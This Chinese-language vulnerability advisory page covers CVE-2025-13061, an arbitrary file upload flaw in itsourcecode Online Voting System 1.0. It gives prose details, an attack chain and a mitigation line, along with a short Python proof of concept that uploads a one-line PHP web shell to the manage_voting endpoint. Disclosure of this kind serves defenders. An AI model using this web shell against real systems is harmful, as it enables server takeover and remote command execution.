IPBUF安全漏洞报告
English
CVE-2025-13061 CVSS 6.3 中危

CVE-2025-13061: itsourcecode在线投票系统1.0任意文件上传漏洞

披露日期: 2025-11-12

漏洞信息

漏洞编号
CVE-2025-13061
漏洞类型
任意文件上传
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
itsourcecode Online Voting System 1.0

相关标签

任意文件上传itsourcecode在线投票系统远程代码执行CVE-2025-13061

漏洞概述

CVE-2025-13061是itsourcecode在线投票系统1.0版本中的一个严重安全漏洞。该漏洞存在于文件管理功能中,攻击者可以利用此漏洞上传任意文件到服务器,从而可能导致远程代码执行。漏洞影响系统的机密性、完整性和可用性,CVSS评分为6.3,属于中等严重程度。由于攻击可远程执行且无需高权限认证,因此该漏洞具有较高的实际利用风险。系统管理员应尽快采取修复措施。

技术细节

该漏洞源于itsourcecode在线投票系统1.0的文件上传功能缺乏充分的安全验证。攻击者可以通过访问/index.php?page=manage_voting端点,利用系统对上传文件类型和内容的检查不足,上传包含恶意代码的文件(如PHP脚本)。由于系统未对上传文件进行适当的扩展名验证、MIME类型检查或内容分析,攻击者可以绕过安全限制。一旦恶意文件成功上传,攻击者即可通过HTTP请求访问该文件,在服务器上执行任意代码,从而获得系统控制权。

攻击链分析

STEP 1
1
识别目标系统及其版本
STEP 2
2
访问文件上传端点
STEP 3
3
绕过文件类型检查
STEP 4
4
上传恶意文件
STEP 5
5
执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' upload_url = f'{target}/index.php?page=manage_voting' # 恶意PHP文件内容 malicious_file = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')} response = requests.post(upload_url, files=malicious_file) print(f'Status: {response.status_code}') print(f'Response: {response.text}')

影响范围

itsourcecode Online Voting System 1.0

防御指南

临时缓解措施
在修复之前,禁用文件上传功能或限制其使用

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表